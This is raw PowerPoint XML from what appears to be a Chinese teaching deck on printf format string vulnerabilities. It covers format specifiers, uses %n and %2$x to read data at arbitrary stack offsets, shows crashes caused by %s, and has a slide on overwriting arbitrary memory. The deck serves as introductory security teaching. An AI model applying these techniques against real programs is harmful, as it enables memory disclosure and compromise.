          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501775" y="3858895"/>
            <a:ext cx="9188450" cy="2080895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pP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大一第一堂课</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" r:link="rId10" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10571797" y="5533275"/>
            <a:ext cx="1620202" cy="1324725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" r:link="rId12" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5533275"/>
            <a:ext cx="1620202" cy="1324725"/>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11" r:link="rId12"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3" r:link="rId14" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6269233"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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6"/>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7"/>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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>理论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811530" y="3837940"/>
            <a:ext cx="4587240" cy="589280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf（"格式化字符串",参数...)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6658610" y="1780540"/>
            <a:ext cx="4656455" cy="878840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>格式字符串是由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>格式化说明符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>组成的，格式化说明符规定参数用什么格式输出内容。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6666865" y="2868295"/>
            <a:ext cx="4649470" cy="2223135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>说明符有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这些：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>%d - 十进制 - 输出十进制整数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>%s - 字符串 - 从内存中读取字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>%x - 十六进制 - 输出十六进制数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>%c - 字符 - 输出字符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>%p - 指针 - 指针地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n - 将之前打印出来的字符个数，赋值参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="1584881426844-4eb92026-1e5c-4dc4-a113-854258f9b8f6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811530" y="2256155"/>
            <a:ext cx="5000625" cy="1190625"/>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200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483995" y="1629410"/>
            <a:ext cx="1470660" cy="1043940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483995" y="3632200"/>
            <a:ext cx="1402080" cy="944880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757045" y="2928620"/>
            <a:ext cx="924560" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正确</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664970" y="5059680"/>
            <a:ext cx="1109345" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267475" y="195228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40270" y="3029585"/>
            <a:ext cx="4449445" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，如str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是%2$x，则输出偏移2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>arg2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>16进制数据0xdeadbeef。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的内容不是正确的地址，或者这个地址是被保护的，那么便会使程序崩溃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782820" y="1951990"/>
            <a:ext cx="3230880" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取任意偏移处的数据！！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="图片 29" descr="微信图片_20210423200310"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="4820920"/>
            <a:ext cx="1828800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片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7958" y="2930161"/>
            <a:ext cx="2390775" cy="215265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P spid="28" grpId="1"/>
      <p:bldP spid="28"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8" r:link="rId9"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0" r:link="rId11"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怎么肥事</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="3200" b="1" spc="200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/why</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3015474" y="1521495"/>
            <a:ext cx="3225800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用scanf函数前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>堆栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="20181209161557934"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488690" y="2464435"/>
            <a:ext cx="1752600" cy="2882265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857875" y="1674495"/>
            <a:ext cx="2540000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输入字符串后的堆栈图：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="20181209161908392"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245225" y="2464435"/>
            <a:ext cx="1917700" cy="2917825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="2464435"/>
            <a:ext cx="2042160" cy="2385060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749030" y="1176020"/>
            <a:ext cx="3442970" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用printf函数的过程：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mov eax，数组首地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>push eax  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>call printf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
              <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
              <a:cs typeface="等线" panose="02010600030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该过程只是将数组的首地址入栈，此时堆栈图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="20181211085421414"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9512300" y="3206115"/>
            <a:ext cx="1711960" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397885" y="5777230"/>
            <a:ext cx="1706880" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>栈底</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>覆盖任意地址内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274955" y="4819650"/>
            <a:ext cx="6470650" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310755" y="1050290"/>
            <a:ext cx="4150995" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>额外赠送：</a:t>
            </a:r>
          </a:p>
          <a:p>
